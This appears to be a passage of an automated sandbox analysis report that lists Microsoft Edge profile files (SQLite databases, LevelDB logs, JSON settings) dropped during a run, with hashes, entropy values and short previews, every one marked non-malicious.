                                                                                                                                                                                                                                                                                  SSDEEP:96:xKU+bGzPDLjGQLBE3up+UBj0tjBo4tgi3JMe9xJDECVjN:xh+GPXBBE3upbBj+HtTTDxVj
                                                                                                                                                                                                                                                                                  MD5:0EBC31C3508E447CD361551C3F641E1B
                                                                                                                                                                                                                                                                                  SHA1:2810E1F9ADF4832FABBB03A6A1E5C39687A9EC3D
                                                                                                                                                                                                                                                                                  SHA-256:11A9AD802A120421005F485C5B734E860501988907FC8060AAA6EF537C216A21
                                                                                                                                                                                                                                                                                  SHA-512:BE51E699A5296BBF87306B2421DE2089362F2EBB1CE3536DF2C7F003AE24DC069F30A05143919C9B80A0FC53C08E874A26E219174A6B0CC65790862525D254E9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'...........H......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.548949447261209
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:zj9P0uucSQkQerkP/KbtZ773pLyhkCgam6IWRKToaAu:zdBBSe2kP/w7s+FmRKcC
                                                                                                                                                                                                                                                                                  MD5:529B85D4F9DC56F6D315EC55F1FDDC8B
                                                                                                                                                                                                                                                                                  SHA1:150BBF265B7DCF5568B576D89E54F11E843553BF
                                                                                                                                                                                                                                                                                  SHA-256:E44830ADBB178DD3F0963DFA13B5CE6A1E2DB1822048E412CD965D7230DE5E1A
                                                                                                                                                                                                                                                                                  SHA-512:55A766CEA6C02D2E594FE01758ADC562FA263AE50BF6BDC6D98D201CC67848D6F20BE537098C91B7286BBAAFD3CF00D054CF635127320FA3A1CFEF60902E4DA6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):406
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2607885381391295
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7VBdjLvYfYeb8rcHEZrELFUtfBdjt/5Bdjf5JfYeb8rcHEZrEZSJ:7V/LYfYeb8nZrExgf/X/xJfYeb8nZrE8
                                                                                                                                                                                                                                                                                  MD5:ED2FE478AEED820DE121411C557F60F5
                                                                                                                                                                                                                                                                                  SHA1:E1D33F92992FDDEEC5C448593181EC89A096E2C6
                                                                                                                                                                                                                                                                                  SHA-256:0E03315B94C5A64BB38C96B8846694CB2FC1298E1A8CD87460A819EE4483B2D8
                                                                                                                                                                                                                                                                                  SHA-512:D38C61E42B651C625ED8B157D1F7502CA4D1681AAEA8CA74D975E1D187788182D5E922F0F512468EB6354224A6123AEB6F5FD2192EEDB1A8DE6249EFA377BB0C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:32:38.218 1d38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/03-17:32:38.219 1d38 Recovering log #3.2025/01/03-17:32:38.219 1d38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):406
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2607885381391295
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7VBdjLvYfYeb8rcHEZrELFUtfBdjt/5Bdjf5JfYeb8rcHEZrEZSJ:7V/LYfYeb8nZrExgf/X/xJfYeb8nZrE8
                                                                                                                                                                                                                                                                                  MD5:ED2FE478AEED820DE121411C557F60F5
                                                                                                                                                                                                                                                                                  SHA1:E1D33F92992FDDEEC5C448593181EC89A096E2C6
                                                                                                                                                                                                                                                                                  SHA-256:0E03315B94C5A64BB38C96B8846694CB2FC1298E1A8CD87460A819EE4483B2D8
                                                                                                                                                                                                                                                                                  SHA-512:D38C61E42B651C625ED8B157D1F7502CA4D1681AAEA8CA74D975E1D187788182D5E922F0F512468EB6354224A6123AEB6F5FD2192EEDB1A8DE6249EFA377BB0C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:32:38.218 1d38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/03-17:32:38.219 1d38 Recovering log #3.2025/01/03-17:32:38.219 1d38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.588979189116146
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:DXZOWLZXbFGXZyTV03Sx497AHHk2GJ348ylsAyG:DX4CXbF8MrZdP8osG
                                                                                                                                                                                                                                                                                  MD5:EEADFDB5D4DA9D9DB1E7D8AE4EBDC539
                                                                                                                                                                                                                                                                                  SHA1:AAC5A29AE052864122BAAE121832079745D44F66
                                                                                                                                                                                                                                                                                  SHA-256:500B0B2D752DDCD4E25A19D90C77C28BF37DB66C4039755A00886FD51ADDD340
                                                                                                                                                                                                                                                                                  SHA-512:CEA0CBAE93A29EFF0F3103F159685E165E5928A0C377EB0D7C570EDBAC3D8E1AAC5B802C9CE5CB5C20FC9A9DC43FA519CF2789BB99D225C9B53E1E4C8792203A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.D.W:................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1178}.!_https://ntp.msn.com..LastKnownPV..1735943564859.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735943566241.._https://ntp.msn.com..MUID!.035D89D9374366AE1C219CB0365A672A.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735943565102,"schedule":[22,35,4,-1,-1,-1,-1],"scheduleFixed":[22,35,4,-1,-1,-1,-1],"simpleSchedule":[24,11,40,52,14,25,29]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735943564815.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250103.256"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):331
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.135305850007223
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCOM+q2Pwkn23oH+Tcwt8a2jMGIFUtfCHMZmw5CwMVkwOwkn23oH+Tcwt8a2jz:7VdM+vYfYeb8EFUtfiM/5fMV5JfYeb8N
                                                                                                                                                                                                                                                                                  MD5:6612AEAA1E83F5F55B81D13F16BB6041
                                                                                                                                                                                                                                                                                  SHA1:FD78CC094F6209A8955355EF33C93ECCB7891D23
                                                                                                                                                                                                                                                                                  SHA-256:1D902672A6B30DF58109009DEEEA8AB76CD32E067C38423F29764F588B378098
                                                                                                                                                                                                                                                                                  SHA-512:D20141769E9AA6EB1C95EB3C533C5B84C8ECFA2A3A2622A5393A443660D464B227206B0163CB4196A435CE99F45176DCB6CD6EBBD2BFE9EC74A4E38051C9A950
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.353 2fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/03-17:33:01.354 2fc Recovering log #3.2025/01/03-17:33:01.359 2fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):331
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.135305850007223
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCOM+q2Pwkn23oH+Tcwt8a2jMGIFUtfCHMZmw5CwMVkwOwkn23oH+Tcwt8a2jz:7VdM+vYfYeb8EFUtfiM/5fMV5JfYeb8N
                                                                                                                                                                                                                                                                                  MD5:6612AEAA1E83F5F55B81D13F16BB6041
                                                                                                                                                                                                                                                                                  SHA1:FD78CC094F6209A8955355EF33C93ECCB7891D23
                                                                                                                                                                                                                                                                                  SHA-256:1D902672A6B30DF58109009DEEEA8AB76CD32E067C38423F29764F588B378098
                                                                                                                                                                                                                                                                                  SHA-512:D20141769E9AA6EB1C95EB3C533C5B84C8ECFA2A3A2622A5393A443660D464B227206B0163CB4196A435CE99F45176DCB6CD6EBBD2BFE9EC74A4E38051C9A950
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.353 2fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/03-17:33:01.354 2fc Recovering log #3.2025/01/03-17:33:01.359 2fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):331
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.135305850007223
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCOM+q2Pwkn23oH+Tcwt8a2jMGIFUtfCHMZmw5CwMVkwOwkn23oH+Tcwt8a2jz:7VdM+vYfYeb8EFUtfiM/5fMV5JfYeb8N
                                                                                                                                                                                                                                                                                  MD5:6612AEAA1E83F5F55B81D13F16BB6041
                                                                                                                                                                                                                                                                                  SHA1:FD78CC094F6209A8955355EF33C93ECCB7891D23
                                                                                                                                                                                                                                                                                  SHA-256:1D902672A6B30DF58109009DEEEA8AB76CD32E067C38423F29764F588B378098
                                                                                                                                                                                                                                                                                  SHA-512:D20141769E9AA6EB1C95EB3C533C5B84C8ECFA2A3A2622A5393A443660D464B227206B0163CB4196A435CE99F45176DCB6CD6EBBD2BFE9EC74A4E38051C9A950
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.353 2fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/03-17:33:01.354 2fc Recovering log #3.2025/01/03-17:33:01.359 2fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):57344
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.863060653641558
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                                                                                                                                  MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                                                                                                                                  SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                                                                                                                                  SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                                                                                                                                  SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.40293591932113104
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                                                                                                                                                  MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                                                                                                                                                  SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                                                                                                                                                  SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                                                                                                                                                  SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):22
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.788754913993502
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YWRAW4J2LSQ:YWyW5SQ
                                                                                                                                                                                                                                                                                  MD5:3BB76EC23C5506830EAD56540E06159F
                                                                                                                                                                                                                                                                                  SHA1:94695E47D907E559E91E677CEC4EB763DC0C5CA9
                                                                                                                                                                                                                                                                                  SHA-256:6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
                                                                                                                                                                                                                                                                                  SHA-512:307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"sts":[],"version":2}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.227495564086887
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:YHO8sqyPQSsBZ6mKNBBBoeeoubInP7E4T3y:YXsIZ6ma3yeevbG7nby
                                                                                                                                                                                                                                                                                  MD5:0867E95EF234E024894ACEAE7C653C84
                                                                                                                                                                                                                                                                                  SHA1:552C1150374D23EAD15996CEBA70FAED29FD51C0
                                                                                                                                                                                                                                                                                  SHA-256:0ECBC977EE977FDD015E9DB4D00607EC84FEF825CB3B79F0553A015AC0233D1A
                                                                                                                                                                                                                                                                                  SHA-512:01342294C23C0B3676939E3E664EAF24EA53DC3EF675520DA7D69601ED2C57CB8C6A77D907C49E51F4B038141FC9488E74C7AB5CB0C82B3692B541C0E339B19E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380510800534577","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com"}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
